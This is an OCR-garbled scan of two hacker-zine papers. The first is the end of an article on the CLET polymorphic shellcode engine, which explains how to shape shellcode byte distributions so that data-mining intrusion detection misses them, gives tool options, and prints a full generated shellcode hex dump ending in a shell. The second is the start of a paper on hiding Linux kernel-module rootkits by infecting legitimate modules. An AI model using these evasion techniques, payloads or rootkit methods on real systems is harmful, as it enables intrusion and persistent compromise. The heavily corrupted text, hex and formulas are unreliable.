explain in 5.3 after having given a quick explaination about data mining 
methods. 


----[ 5.2 - A example of a data mining method, the neural approach 
or using a perceptron to recognize polymorphic shellcode. 


As we explained it before, we want that, from a set of criterions detected 
by some network probes, a manager takes a real time reliable decision on 
the network trafic. With the development of polymorphic engines, maybe 
pattern matching will become inefficient or too difficult to be 
implemented because you have to create lots of rules, perhaps sometimes 
you don’t know. Is there a solution? We have lots of informations and we 
want to treat them quickly to finaly obtain a decision, that’s the general 
goal of what are called data mining methods. 


In fact, the goal of data mining is the following: 


from a big set of explanatory variables (X1,..,XN) we search to take a 
decision on an unknown variable Y. Notice that: 


* this decision has to be taken quickly (problem of calculating 
complexity) 
* this decision has to be reliable (problem of positif falses...) 


There is a lot of methods which belongs to theory of data mining. To 
make understanding the CLET approach about anti-data mining methods, we 
have decided to show one of them (actually bases of one of them): the 
connexionist method because this method has several qualities for 
intrusion detection: 


* the recognition of intrusion is based on learning. For example, with an 
only neuron, the learning consists in choosing the best explanatory 
variables X1,...,XN and setting the best values for the parameters 
wl,...wN (cf below). 
* thanks to this learning, a neural network is very flexible and is able 
to work with a big number of variables and with explanation of Y with the 
variables X1,...,XN (). 


So, in a network, such an approach seems to be interesting, since the 
number of explanatory variables is certainly huge. Let’s explain bases of 
ates 


aaa [ 5.2.A - Modelising a neuron. 
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To understand how can work an IDS using a data-mining method based on 
neural approach, we have to understand how work a neuron (so called 
because this kind of programs copy neuron of your brain). The scheme 
below explains how a neuron runs. 

As in your brain, a neuron is a simple calculator. 


X1 wl 
X2 w2 
Neuron —-fh[ (w1l*X1 + w2*x2 + 1... + wN*XN)-B] 
XN wN 
fh is the function defined by: 


fh(x)=1 if x>0 B is called the offset of the neuron. 
fh(x)=0 if x<=0 


So we understand that the exiting value is 0 or 1 depending of the 
entering value X1,X2,...,XN and depending on wl,w2,...,wN. 


S455 [ 5.2.B - a data-mining method: using neural approach in an IDS. 


Imagine now that the value X1,X2,...,XN are values of the data of a 
packet: Xl is the first byte, X2 the second,..., XN the last one (you can 
choose X1 the first bit, X2 the second, etc... if you want that the 
entering values are 0 or 1) (we can choose too X1 number of \x00, X2 
number of \x01,... there are many methods, w xpose one idea here in 
order to explain data mining). The question is: which wl,w2,...wN have we 
to choose in order to generate an exiting value of 1 if the packet is a 
‘dangerous’ one and 0 if it is a normal one? We can’t find value, our 
neuron have to learn them with the following algorithm: 


wl,w2,...,wN is first chosen randomly. 

Then we create some packets and some /dangerous’ packets with polymorphic 
engine, and we test them with the neuron. 

We modify the wl when the exiting value is wrong. 


If the exiting value is 0 instead of 1: 
wl <- wl + z*xI 0<=I<=N 
If the exiting value is 1 instead of 0: 
wl <- wl - z*xI 0<=I<=N 


z is a constant value chosen arbitrarily. 


In easy stages, neuron will ‘learn’ to recognize normal packets from 
‘dangerous’ ones. In a real IDS, one neuron is not sufficient, and the 
convergence have to be studied. There is however two big advantages of 
neural approach: 


* decisions of a neural network depend not directly on rules written by 
humans, they are based on learning which set "weights" of different 
entries of neurons according to the minimization of particular statistical 
criterions. So the decisions are more shrewd and more adapted to the local 
network traffic than general rules. 

* when the field of searching is important (huge data bases for pattern 
matching), data mining approach is quicker because the algorithm has not 
to search in a huge data bases and as not to perform a lot of calculations 
(when the choice of the network topology, of explanatory variables and 
learning are "good"...) 


----[ 5.3 - Spectrum Analysis in CLET against data mining method. 


The main idea of the method w xpose upper, like lots of data mining 
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methods, is to learn to recognize a normal packet from a ’dangerous’ 
packet. So we understand that to struggle this kind of methods, simple 
polymorphism can be not enough, and alphanumeric method (enjoy the 
excellent article of rix), can be inefficient. Indeed, in a case of a 


non-alphanumeric communication, alphanumeric data will be considered as 
strange and will create an alert. The question is to know how a polymorph 
engine can generate a polymorphic shellcode which will be considered as 


normal by an IDS using data mining methods. Maybe CLET engine shows a 
beginning of answer. Howerer we are aware of some weaknesses (for 

nstance the SpectrumFile has no influence under the fakenot zone), we work 
today on this weaknesses. 

Let’s see how it works. 


Imagine the following case: 


Firewall | 
; | | Server | 
IDS | | | 

| 


| 
Internet | 
| 
| 


We can suppose that the IDS analyses the entering packet with a port 
destination 80 and the ip of the server with data mining methods. 

To escape this control, our idea is to generate bytes which values are 
dependant on the probability of this values in a normal trafic: 


theo@warmach# sniff ethO 80 2>fingerprint & 
theo@warmach$ lynx server.com 

The program sniff will listen on interface ethO the leaving packet with a 
destination port 80 and record the data of them in a file fingerprint in 
binary. 

Then, we begin to navigate normally to record a ’normal’ trafic. 


theo@warmach$ stat fingerprint Spectralfile 


The program stat will generate a file Spectralfile which content have the 
following format: 


O (number of bytes \x00 in leaving data destinated to server) 
1 (number of bytes \x01 in leaving data destinated to server) 


FF (number of bytes \xFF in leaving data destinated to server) 


This Spectralfile can be generated by lots of methods. Instead of my 
example, you can decide to generate it from the trafic on a network, 
you can decide to write it if you have specials demands.... 


Now the question is, how can we use this file? how can we use a 
description of a trafic? Option f of clet allows us to use a analysis of 
a trafic, thanks to this spectral file. 


theo@warmach$ clet -n 100 -c -b 100 -f Spectralfile -B 
(cf 6 for options) 


Action of option -f is different between the different zones (NOPzone, 
decipher routine, shellcode, cramming zone). Indeed we want to modify, 
thanks to SpectralFile, process of generation of polymorphic shellcode but 
we can’t have the same action upon the different zones because we hav 
constraints depending on zones. It’s for instance, in some cases, very 
difficult to generate a fake nop zone according to a spectrum analysis. 


Let see how we can act upon this different zones. 


eeu e [ 5.3.1 - Generate cramming bytes zone using spectrum analysis. 
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The simplest idea is to generate a craming bytes zone which spectrum is 
the same than trafic spectrum: 


| FAKENOP | DecipherRoutine | shellcode | bytes to cram | return adress | 


A 


| 
| 
the probability of these bytes 
are dependant on the Spectralfile 
(without the value \x00) 


If there is no file in argument, there is equiprobability for all the 
values (without zero)... 
This process of generation is used if you don’t use -B option. 


However cramming bytes zone is the gold zone. In that way, we can generate 
bytes we want. Remember that in some zones, we don’t use spectrum 

analysis (like in DecipherRoutine in our version). It will more usefull to 
use cramming bytes zone in order to add bytes we lack in previous zones in 
which we can’t so easily use spectral file. Let’s go! 


Se aes [ 5.3.1.A - A difficult problem 


To explain it, we will take a simpl xample. We are interested in a zone 
where there are only thr bytes accepted called A,B,C. A spectrum study 
of these zone shows us: 


A: 50 
B: 50 
Gs -L0.0 


The problem is that, because of our shellcode and our nop_zone, we have 
the following fixed beginning of our packet: 


ABBAAAAA (8 bytes) 


We can add two bytes with our cramming zone. The question is: 
which 2 bytes have we to choose? 


The answer is relativy simple, intuitively we think of CC, why? 
because C is important in trafic and we don’t have it. In fact, if we 
call 
Xa the random variable of Bernouilli associated to the number of A in the 
first 9 bytes 

Xb the random variable of Bernouilli associated to the number of B in the 
first 9 bytes 

Xc the random variable of Bernouilli associated to the number of C in the 
first 9 bytes 


we intuitively compare p(Xa=6) *p (Xb=2) *p(Xc=1) > p(Xa=7) *p (Xb=2) 
and p(Xa=6) *p (Xb=2) *p (Xc=1) > p(Xa=6) *p (Xb=3) 


Thus, we choose C because the packet ABBAAAAAC have, spectrumly speaking, 
more probablities to exist than ABBAAAAAA or ABBAAAAAB. 


Maybe you can think that it is because C has the most important 
probability in the trafic. It’s a wrong way of thinking. Indeed, imagine 
we have the following beginning: 


CCCCCBBB 


how have to choose the next byte? we will choose A although A and B have 
the same probability to come because of the reason explained upper. 
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Ok so we choose C. Using the same principles, we then choose C for the 
tenth bytes: ABBAAAAACC. 


The problem is that we can’t use this method to generate the cramming 
bytes. Indeed, this method is fixed. When we write fixed, we want to say 
that the first 8 bytes fixed the two following. That is a weakness! 

In that way, if we generate the cramming bytes zone by this method, that 
means that the beginning zone (nop_zon decipher + shellcode) will fix 
the cramming zone. If we use a principle, we create a method to recognize 
our packet. Take the beginning and try with the same principles to create 
a cramming zone. If you obtain the same bytes then the packet have been 
created by CLET polymorphism engine (even if it is not easy to find the 
beginning of the cramming bytes zone). You can discard it. 


So now we have to introduce a law of probability. Indeed, if we have the 
following beginning: ABBAAAAA, we have to increase the probability to 
obtain a C and decrease probability to obtain B or A. But this last 
probabilities mustn’t be null! The real question is thus: 

how modifying probability of A,B,C in order to finally obtain a packet 
which spectrum is close to trafic spectrum? 


sane [ 5.3.1.B - A logical idea. 


Take the last example: we hav 


ABBAAAAA 


and a spectrum file with: 
A=50; B=50; C=100; 


how choosing laws of probabilty? 
With notations used upper and in case of all the bytes would have been 
chosen using spectrum file, we would have: 


E[Xa]=9/4 
E[Xb]=9/4 
E[Xc]=9/2 


= 


E[X] is written for the hope of the random variable X (mathematicaly 


speaking in our case: E[X]=p(X)*size (here 9) because it’s a Bernouilli 
variable). 


In fact we have 6 A and 2 B. 
Because 9/4-6 <0, it will stupid to generate a A, we can write that the 
new probability of A is now p(A)=0! 


However 9/4-2 >0 and 9/2-0>0 so we can still generate B and C to ajust the 
spectrum. We must have p(B)>0 and p(C)>0. 
We have: 


9/4-2=1/4 
9/2-0=9/2 


So intuitively, we can think that it is logic that C has a probablity 
(9/2) /(1/4)=18 bigger than probability of B. Thus we have to solve the 
system: 


| p(C)=18*p (B) ie | p(B)=1/19 
| p(C) +p (B)=1 | p(C)=18/19 


and we obtain laws for generate the ninth byte. 
Then we can use the same algorithm to create cramming byte zone. 


However this algorithm has the following problem: 


the big problem is to know in what conditions we have: 


E[Xa] ~ sizeof(packet) * p(A) 


9. 


txt 
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E[Xb] ~ sizeof(packet) * p(B) 
E[Xc] ~ sizeof(packet) * p(C) 
when sizeof(cramming zone) ---> +00 
ie when sizeof (paquet) > +00 


~“ means equivalent to (in the mathematical sense). 


sizeof (packet) * p(.) would be the hope in case of the whole packet would 
have been generated depending on trafic (because in such a case, Xa,Xb,.. 
would be variables of Bernouilli, see [7]). Remember it’s what we want. 


want that our cramming byte zone generate a packet which entire spectrum 
is close to trafic spectrum. We want that our laws ‘/correct’ 


of the beginning. n hope that it will be the cas 


Intuitively we ca 


We 


the spectrum 


becaus 


we favour lacking bytes over the others. However, it is a bit difficult to 


prove it, 


mathematically speaking. Indeed take E[Xa] for 


instance. 


It’s 


very difficult to write it. In that way laws to generate the N byte 
depending on the N-1 random byte. In our example, laws to generate the 


tenth byte are not the same if we have ABBAAAAAC or ABBAAAAAB. 


that to avoid a fixed method the two cases are allowed! 


That’s for all this reasons we have chosen a simp] 


[ 5.3.1.C - CLET Method. 


If you don’t use the option -B, cramming bytes zone will 
explain in the beginning of 5.3.1, without taking the beginning into 


account. 


ler method. 


l be generated as 


We can begin to explain how this method is imp] 


lemented, how it 


Remember 


uses the spectrum file. Imagine we have the following spectrum file: 


First we can notice that we don’t take care of the first line because we 
can’t generate zeros in our zone. 


6 
18 


We build the following board: 


| sizeof (board) | 1 | 2 | 3 | FC 
| XXXXXXXXX | 18 |. L3#RS> | 3432.) 6337.1] 
= 31 = 63 = 100 


Then we randomly choose a number n between 1 and 100 and we make a 
dichotomic search in the board (to limit the complexity 
sorted board). 


if 
if 
DE 
nig 


0) 

18 
31 
63 


generate \x01 


<n <= 18 w 

<n <= 31 we generate \x02 
<n <= 63 we generate \x03 
<on 


<= 100 we generate \xFC 


because w 


hav 


a 


This method allows us to generate a cramming bytes zone with p(1)=18/100, 


p (2) =13/100, 


p(3)=32/100 and p(FC)=37/100, 


without using float division. 


Now let’s see how the option -B take the beginning into 


W 


tak 


the sam xample with the same spectrum file: 


sizeof (board) 


| 1 | 2 | 3 | FC | 


account. 


XXXXXXXXX 


| 18 | 13418 | 31432 | 63+37 | 
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To take the beginning into account, we modify the board with the following 
method: 


Imagine we have to generate a 800 bytes cramming bytes zone, the beginning 
have a size of 200 bytes. In fact, at the end, our packet without the 
adress zone will have a size of 1000 bytes. 


We call Ntotal the max value in board (here 100) and b the size of the 
packet without the adress zone (here 1000). 

b= bl + b2 (bl is size of the beginning=fakenop+decipher+shellcode and b2 
is size of cramming byte zone). Here b1=200 and b2=800. 


Let’s see how we modify the board, for instance with byte \x03. We call q3 
the number of byte \x03 we found in the beginning. (here we choose q3=20). 


We make q3*Ntotal/b=20*1/10=2 and then we make 63-2=61. We obtain the 
following board: 


| sizeof (board) | dl | 2 | iS} | FC 
| XXXXXXXXX | 18 | 134+18 | 63-02 | 61+37 | 
= 31 = 61 = 98 


So now, we can think that we have a probability of 30/98 to generate \x03, 
however this algorithm have to be use to modify all value. The value 98 
will be thus modified. We apply the same algorithm and we can suppose we 
finally obtain the board: 


| sizeof (board) | 1 | 2 | 3 | FC 
| XXXXXXXXX | 16 | Tae | 2S 7 | 57433 | 
= 27 = 90 


p(\x01)= 16/90 
p(\x02)= 11/90 
p(\x03)= 30/90 
p(\xFC)= 33/90 


This laws will be use to generate all the cramming bytes zone. 
Intuitively, we understand that, with this method, we correct our 

spectrum depending on the values we have in the beginning. The question is 
now, can we prove that this method do a right correction, that: 


E[Xn] ~ b*p(n) when b ---> +00 


where X is a random variable of bernouilli which count the number of the 
byte n in the packet and p(n) the probability of n to appear in the 
trafic. 


If such is the case, that means that E[X], with a sufficient value of b, 
is ’like a simple bernoulli hope’. It’s like we have generated the whol 
packet with probabilities of the trafic! 


Let’s prove it! 


We take the same notation. Ntotal is total sum of data in the trafic. 
b=bl1+b2 (bl size of beginning, b2 size of cramming zone). 

We call q(\xA2) number of \xA2 bytes in beginning (fakenop +decipher + 
shellcode) and n(\xAE) the number initially written in spectrum file near 
AE. 


We take a byte that we call TT. 


E([Xt] = q(IT) + b2 * p! (TT) 
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p’ (TT) is the probability for having n after modification of the board. As 
we see previously: 


n(TT) -— q(TT)*Ntotal/b 

p’ (TT) 
Ntotal - ( q(\x00)+ q(\x01) + ...... + q(\xFF) )*Ntotal/b 
So we have: 
n(TT) -— q(TT) *Ntotal/b 
E[Xt]=q (TT) +b2* 
Ntotal - (q(\x00)+ q(\x01) + ...... + q(\xFF))*Ntotal/b 

We simplify by Ntotal: 

(b2*n(TT))/Ntotal - q(TT)*b2/b 
E[Xt]=q(TT) 4 

TC GCNKO0) + QGNKOD): Ae se igestecs + q(\xFF))/b 

Ok, when b > +00, we hav 


b27~b (b=b1+b2 and bl is a constant) 


thus (q(\x00)+ q(\x01) + ...... + q(\xFF))/b = o(1) and: 
1 — (q(\x00)+ q(\x01) + ...... + Q(\xFF))/b ------- So: 
so E[Xt] = q(TT) + b*(n(TT)/Ntotal) - q(TT) + o(b) 
Moreover we have p(n)=n(TT)/Ntotal so 
E[Xt] = b*p(n) + o(b) 
so E[Xt] ~ b*p(n) we got it! 


We can notice that we got this relation with the first simple method. We 
can so think that this second method is not better. It is wrong because 
remember that this relation doesn’t show that a method is good or not, it 
just shows if a method is fair or not! This second method takes beginning 
into account, so it is better that the simple one. However befor 
demonstration we can’t know if this method was fair. We just knew that if 
it was fair, it will better than the simple one. Now we know that it is 
fair. That’s why CLET uses it. 


eke [ 5.3.2 - Generating shellcode zone using spectrum analysis. 


There is a very simple idea: generating several decipher routines and 
using the best one. But how choose the best one? 


Remember we want to generate a shellcode which will be considered as 
normal. So we could think that the best decipher routine is the one which 
allows to generate a shellcode which spectrum is close to trafic spectrum. 
However it’s important to understand that this kind of approach has its 
limits. Indeed, imagine following cases: 


We have an IDS which data mining methods is very simple, if it finds a 
byte \xFF in a packet, it generate an alert and discard it. We have the 
following spectrum file: 


41 15678 
42 23445 
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The shellcode we generate will have many \x41 and \x42, but imagine it 

has a \xFF in the ciphered shellcode. Our packet will be discarded. 
However if we have done a packet without spectrum file and without a \xFF 
byte, this packet would have been accepted. We think that the more the 
shellcode will have a spectrum close to trafic spectrum, the more the 
packet have probability to be accepted. However, it can exist exception as 
we see in th xample (we can notice that in example the rule was very 
clear, but rules generated by data mining method are less simple). 

The main question is thus: how defining a good polymorph shellcode? 


Against data mining method there is a simple idea, we have to define a 
measure which let us to measure a value of a shellcode. How finding this 
measure? For the moment we work on a measure which favours shellcode which 
spectrum is close to trafic spectrum by giving a heavy value of bytes 
which don’t appear in trafic. However, this method is not implemented in 
version 1.0.0 because today IDS with data-mining methods are not very 
developped (there is SNORT) and so it is difficult to see what kind of 
caracteristics will be detected (size of packet, spectrum of packet, ...) 
and it is so difficult to define a good measure. 


Site ae [ 5.3.3 - Generating fakenop zone using spectrum analysis. 


In this part, we don’t perform to modify the code following the spectrum 
analysis due to difficulties of such an implementation. We just are 
trying to generate random code with the my_random function which gives a 
uniform probability to generate number between min and max... : ( 

We still could think about a function which would give a weight for each 
A 

g 

t 

T 


nstruction following the results of a spectrum analysis, and we could 
nerate fake-nop with a random function whose density function corresponds 
o the density of probability given by the former function... 
he problem with this method is that the set of instructions is smaller 
than the set of all the hexa codes that contains the network traffic. 
Such a finding automaticaly dodges the issues of our method, and all we 
can do is to minimalise the difference of spectrum between our code and 
a normal network traffic and try to compensate with other parts of the 
shellcode we better control (like the craming bytes)... 


----[ 5.4 - Conclusion about anti data-mining methods. 


Spectrum Analysis an approach, it’s not the only one. We are aware too 
that, with methods like neural method exposed upper, it is possible to 
generate a filter against CLET polymorphic shellcodes, if you use our 
engine as a benchmark to involve your neural system. That’s a interessant 
way of using! Maybe it is interessant too to think about genetic methods 
in order to find the best approach (cf [5]). However, today data-mining 
begins and so it’s difficult to find the best approach... 


--[ 6 - The CLET Polymorphic Shellcode Engine 


----[ 6.1 - Principles 


We decided to make a different routine at each time, randomly. We first 
generate a XOR (with a random key) at a random place, and then we generat 
reversible instructions (as many as you want) : ADD/SUB, ROL/ROR. We don’t 
generate it in assembly but in a pseudo-assembly language, it is easier to 
manipulate pseudo-assembly language at this point of the program because we 
have to make two things at the same time : cipher the shellcode and generate 
the decipher routine. 


Let’s see how it works 
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pseudo-code of 


the decipher < 
routine 
traduction interpretation 
cipher 

YES 

decipher ciphered 

routine shellcod >| zeroes? 
NO 


polymorphed 
shellcode 


Of course, when a cipher routine has been generated, we test it to see if a 
zero appear in the ciphered code (we also take care of not having zeroes in 
the keys. If it is the case, we replace it by a 0x01). If it is the case, a 
new cipher routine is generated. If it is good, we generate the decipher 
routine. We don’t insert fake instructions among the true instructions of 
the decipher routine, it could improve the generator. 


The main frame of our routine is rather the same (this is maybe a weakness) 
but we use thr registers. But we take care of using different registers 
at each time, ie those thr registers are chosen at random (cf 4.2) 


----[ 6.2 - Using CLET polymorphic engine 


theo@warmach$ ./clet -h 


The CLET shellcode mutation engine 

by CLET TEAM: 

Theo Detristan, Tyll Ulenspiegel, 

Mynheer Superbus Von Underduk, Yann Malcom 


Don’t use it to enter systems, use it to understand systems. 


Version 1.0.0 


Syntax 
./clet 
—-n nnop : generate nnop NOP. 
-a : use american english dictonnary to generate NOP. 
=—¢ : print C form of the buffer. 


-i nint : decryption routine has nint instructions (default is 5) 
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f file : spectrum file used to polymorph. 
-b ncra : generate ncra cramming bytes using spectrum or not 
-B : cramming bytes zone is adapted to beginning 
-t : number of bytes generated is a multiple of 4 


-x XXXX : XXXX is the address for the address zone 


FEOLIEC9 for instance 
-z nadd : generate address zone of nadd*4 bytes 
-e : execute shellcod 
-d : dump shellcode to stdout. 
-s : spectrum analysis. 
-S file : load shellcode from file. 
-E [1-3]: load an embeded shellcod 
-h : display this message. 


In bytes: 

—n nnop -b ncera -z nadd/4 
<-------- > < >< > 
| FAKENOP | DecipherRoutine | shellcode | bytes to cram | return adress | 


-t allows that: 


Size_of_fake_nop_zone + Size_decipher + Size_decipher + Size_cramming 
is a multiple of 4. This option allows to alignate return adresses. 


-i is the number of fake instructions (cf 6.1) in the decipher routine. 
/* Anti-data mining options: 


-f you give here a spectrum file which shows trafic spectrum (cf 5.3) 
If you don’t give a file, probabilities of bytes are the sam 


-B the option -b generates a cramming bytes zone. If the option is used 
without -B, process of generation doesn’t take care of the fakenop 
zone, ciphered shellcode, etc... Indeed if -b is used with -B then 
cramming bytes zone tries to correct spectrum ’errors’ due to the 
begininning. 


/* Shellcode 
E allows you to choose one of our shellcode. 

is a classic bash (packetstorm). 

2 is aleph one shellcod 

3 is a w0Qw00 code which add a root line in /etc/passwd 
(don’t use it with -e in root) 


-S allows us to give your shellcode. It’s important because our 
shellcodes are not remote shellcode! You give a file and its bytes 
will be the shellcode. If you just have a shellcode in Cformat you can 
use convert. 


xecute th ncerypted shellcode, you see your polymorphic shellcode 
runs. 


Leo 8 the generated shellcod 


-c writes the shellcode in C format. 


-d dump it on stderr. 


/* Example 


al 


theo@warmach$ ./clet 2 -b 50 -t -B -c -f ../spectrum/stat2 -a -n 123 
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—a -x AABBCCEE -z 15 -i 8 


[+] Generating decryption loop 
ADD 4ECOCB5C 


ROR 19 

SUB 466D336C // option -i 

XOR A535C6B4 // we've got 8 instructions. 
ROR D 

ROR 6 


SUB 51289E19 
SUB DAD72129 
done 


[+] Generating 123 bytes of Alpha NOP : 
NOP : SUPREMELYCRUTCHESCATARACTINSTRUMENTATIONLOVABLYPERILLABARB 
SPANISHIZESBEGANAMBIDEXTROUSLYPHOSPHORSAVEDZEALOUSCONVINCEDFIXERS 
done 


// 123 bytes, it’s the -n 123 option. -a means alphanumeric nops. 


[+] Choosing used regs 


work_reg : %edx 
left_reg : %ebx // regs randomly chosen for decipher routine. 
addr_reg : %ecx 

done 


+] Generating decryption header 
done 


+] Crypting shellcode 
done 


+] Generating 50 cramming bytes // -b 50 bytes of cramming bytes 


+] Using ../spectrum/stat2 // -£ ../spectrum/stat2: bytes 
+] Adapting to beginning // depends on spectrum file. 
done // -B options: Adapting to beginning 
Lf CE D341 
[+] Generating 1 adding cramming bytes to equalize // -t option 
[+] Using ../spectrum/stat2 // we can now add adresses of 4 bytes 
done 


[+] Assembling buffer 
buffer length : 348 
done 


// This all the polymorph shellcode in C format (option -c) 


Assembled version 
\x53\x55\x50\x52 

\x45\x4D\x45\x4 
\x59\x43\x52\x5 
\x54\x43\x48\x4 
\x53\x43\x41\x5 
\x41\x52\x41\x4 
\x54\x49\x4E\x5 
\x54\x52\x55\x4 
\x45\x4E\x54\x4 
\x54\x49\x4F\x4 
\x4C\x4F\x56\x4 
\x42\x4C\x59\x5 
\x45\x52\x49\x4 
\x4C\x41\x42\x4 
\x52\x42\x53\x5 
\x41\x4E\x49\x5 
\x48\x49\x5A\x4 
\x53\x42\x45\x4 
\x41\x4E\x41\x4 


OATWoOrFaQaorwArvuewwe ungQq 
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\x42\x49\x44\x45 
\x58\x54\x52\x4F 
\x55\x53\x4C\x59 
\x50\x48\x4F\x53 
\x50\x48\x4F\x52 
\x53\x41\x56\x45 
\x44\x5A\x45\x41 
\x4C\x4F\x55\x53 
\x43\x4F\x4E\x56 
\x49\x4E\x43\x45 
\x44\x46\x49\x58 
\x45\x52\x53\xEB 
\x3B\x59\x31\xDB 
\xB3\x30\x8B\x11 
\x81\xC2\x5C\xCB 
\xCO\x4E\xC1\xCA 
\x19\x81\xEA\x6C 
\x33\x6D\x46\x81 
\xF2\xB4\xC6\x35 
\xA5\xC1\xCA\x0D 
\xC1\xCA\x06\x81 
\XEA\x19\x9E\x28 
\x51\x81\xEA\x29 
\x21\xD7\xDA\x89 
\x11\x41\x41\x41 
\x41\x80\xEB\x04 
\x74\x07\xEB\xCA 
\xE8\xCO\xFF\xFF 
\xXFF\xE3\xBF\x84 


\x3E\x59\xF4\xF 


\XEE\xXE7\xCF\xE2 
\xA2\x02\xF8\xBE 


D 


\x1D\x30\xEB\x32 
\x3C\x12\xD7\x5A 
\x95\x09\xAB\x16 
\x07\x24\xE3\x02 
\xEA\x3B\x58\x02 
\x2D\x7A\x82\x8A 
\x1C\x8A\xE1\x5C 
\x23\x4F\xCF\x7C 


\xXF5\x41\x41\x43 


\x42\x43\x0A\x4 
\x43\x43\x41\x4 
\x42\x43\x43\x4 
\x43\x43\x43\x4 
\x43\x43\x43\x4 


\x43\x43\x43\x4 
\x41\x42\x43\x4 
\x43\x41\x43\x4 
\x42\x43\x43\x4 
\x0D\x41\x43\x4 
\x42\x41\x43\x4 


3 
1 
3 
2 
3 
\x43\x0D\x0D\x43 
3 
3 
2 
2 
1. 
3 


\xAA\xXBB\xCC\xEE 


\xAA\xBB\xCC\xEE 


a 


\xAA\xXBB\xCC\xEE 


\xAA\xXBB\xCC\xEE 


\xAA\xXBB\xCC\xEE 


\xAA\xBB\xCC\xE 


\xAA\xBB\xCC\xE 


\xAA\xBB\xCC\xE 


\xAA\xBB\xCC\xE 


\xAA\xBB\xCC\xE 


\xAA\xBB\xCC\xE 


\xAA\xBB\xCC\xE 


\xAA\xXBB\xCC\xEE 


\xAA\xBB\xCC\xEE 


\xAA\xXBB\xCC\xEE 


// -t option: 


it is equalized. 


// -z 15 option: 15*sizeof(adress) zone 


// -x BRABBCCEE 


option gives the adress 
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Executing buffer : ... // -e option we test our polymorph shellcode 
sh-2.05a$ // -E 2 we've chosen Aleph One shellcod 
// That’s it. 


7 References 


1] http://www.phrack.org/p49-14 
Smashing The Stack For Fun And Profit, Aleph One 
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Volume 2: Instruction Set Reference 
http://www.intel.com/design/pentium4/manuals/ 
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— Introduction 


a few years we have seen a lot of rootkits using loadable kernel 


les. Is this a fashion ? not really, lkm’s are widely used because they 


are powerfull: you can hide files, processes and do other nice things. 


The 


n 


first rootkits using lkm’s could be easily detected because they 


Ww 
m 
1 
b 
F 
iT 


odu 


¥ 


d 


listed when issuing a lsmod. We have seen lots of techniques to hide 


les, like the one used in Plaguez’s paper [1] or the more tricky used 
the Adore Rootkit [2]. A few years later we have seen other techniques 
e 


on the modification of the kernel memory image using /dev/kmem [3]. 


nally, a technique of static kernel patching was presented to us in [4]. 
his one solves an important problem: the rootkit will be reloaded after a 


reboot. 


The 


goal of this paper is to describe a new technique used to hide lkm’s 


and to ensure us that they will be reloaded after a reboot. We are going 
see how to do this by infecting a kernel module used by the system. We 


to 


will 


app 


is 


focus on Linux kernel x86 2.4.x series but this technique can be 
lied to other operating systems that use the ELF format. Some knowledge 


necessary to understand this technique. Kernel modules are ELF object 


fil 


Les, 


we will thus study the ELF format focusing on some particular parts 
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related to the symbol naming in an ELF object file. After that, we will 
study the mechanisms wich are used to load a module to give us some 
knowledge on the technique which will permit to inject code into a kernel 
module. Finally, we will see how we can inject a module into another one in 
real life. 


--[ 2 - ELF Basis 


The Executable and Linking Format (ELF) is the executable file format 
used on the Linux operating system. We are going to have a look at the part 
of this format which interests us and which will be useful later (Read [1] 
to have a full description of the ELF format). When linking two ELF 
objects the linker needs to know some data refering to the symbols 
contained in each object. Each ELF object (lkm’s for example) contains two 
sections whose role is to store structures of information describing each 
symbol. We are going to study them and to extract some usefull ideas for 
the infection of a kernel module. 


----[ 2.1 - The .symtab section 


This section is a tab of structures that contains data requiered by the 
linker to use symbols contained in a ELF object file. This structure is 
defined in the file /usr/include/elf.h: 


/* Symbol table entry. */ 


typedef struct 
{ 


E1£32_Word st_name; /* Symbol name (string tbl index) */ 
E1£32_Addr st_value; /* Symbol value */ 
E1£32_Word st_size; /* Symbol size */ 
unsigned char st_info; /* Symbol type and binding */ 
unsigned char st_other; /* Symbol visibility */ 
E1f32_ Section st_shndx; /* Section index */ 
} EL£32_Sym; 
The only field which will interest us later is st_name. This field is an 


index of the .strtab section where the name of the symbol is stored. 


----[ 2.2 - The .strtab section 


The .strtab section is a tab of null terminated strings. As we saw above, 
the st_name field of the E1f32_Sym structure is an index in the .strtab 
section, we can thus easily obtain the offset of the string which contains 
the name of the symbol by the following formula: 


offset_sym_name = offset_strtab + st_name 


offset_strtab is the offset of the .strtab section from the beginning of 
the file. It is obtained by the section name resolution mechanism which I 
will not describe here because it does not bring any interest to the 
covered subject. This mechanism is fully described in [5] and implemented 
in the code (paragraph 9.1). 


We can then deduce that the name of a symbol in a ELF object can be 
easily accessed and thus easily modified. However a rule must be complied 
with to carry out a modification. We saw that the .strtab section is a 
succession of null terminated strings, this implies a restriction on the 
new name of a symbol after a modification: the length of the new name of 
the symbol will have to be lower or equal to that of the original name 
overwise it will overflow the name of the next symbol in the .strtab 
section. 


We will see thereafter that the simple modification of a symbol’s name 
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will lead us to the modification of the normal operation of a kernel module 
and finally to the infection of a module by another one. 


--[ 3 - Playing with loadable kernel modules 


The purpose of the next section is to show the code which dynamically 
loads a module. With this concepts in mind, we will be able to foresee the 
technique which will lead us to inject code into the module. 


----[ 3.1 - Module Loading 


Kernel modules are loaded with the userland utility insmod which is part 
of the modutils[6] package. The interesting stuff is located in the 
init_module() functions of the insmod.c file. 


static int init_module(const char *m_name, struct obj_file *f, 
unsigned long m_size, const char *blob_name, 
unsigned int noload, unsigned int flag_load_map) 


(1) struct module *module; 
struct obj_section *sec; 
void *image; 
int ret = 0; 
tgt_long m_addr; 


(2) module->init = obj_symbol_final_value(f, 
obj_find_symbol(f, "init _module")); 
(3) module->cleanup = obj_symbol_final_value(f, 
obj_find_symbol(f, "“cleanup_module") ); 
if (ret == 0 && !noload) { 
fflush (stdout); /* Flush any debugging output */ 
(4) ret = sys_init_module(m_name, (struct module *) image); 
if (ret) { 
error ("init_module: %m"); 
lprintf ( 


"Hint: insmod errors can be caused by incorrect module parameters, " 
"including invalid IO or IRQ parameters.\n" 
"You may find more information in syslog or the output from dmesg"); 


} 


} 


This function is used (1) to fill a struct module which contains the 
necessary data to load the module. The interestings fields are init_module 
and cleanup_module which are functions pointers pointing respectively to 
the init_module() and cleanup_module() of the module being loaded. The 
obj_find_symbol() function (2) extracts a struct symbol by traversing the 
symbol table and looking for the one whose name is init_module. This struct 
is passed to the obj_symbol_final_value() which extracts the address of the 
init_module function from the struct symbol. The same operation is then 
carried out (3) for the function cleanup_module(). It is necessary to keep 
in mind that the functions which will be called when initializing and 
terminating the module are those whos ntry in the .strtab section 
corresponds respectively to init_module and cleanup_module. 


When the struct module is completely filled in (4) the sys_init_module() 
syscall is called to let the kernel load the module. 


Here is the interesting part of the sys_init_module() syscall wich is 
called during module loading. This function’s code is located in the 
/usr/src/linux/kernel/module.c file: 
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asmlinkage long 
sys_init_module(const char *name_user, struct module *mod_user) 
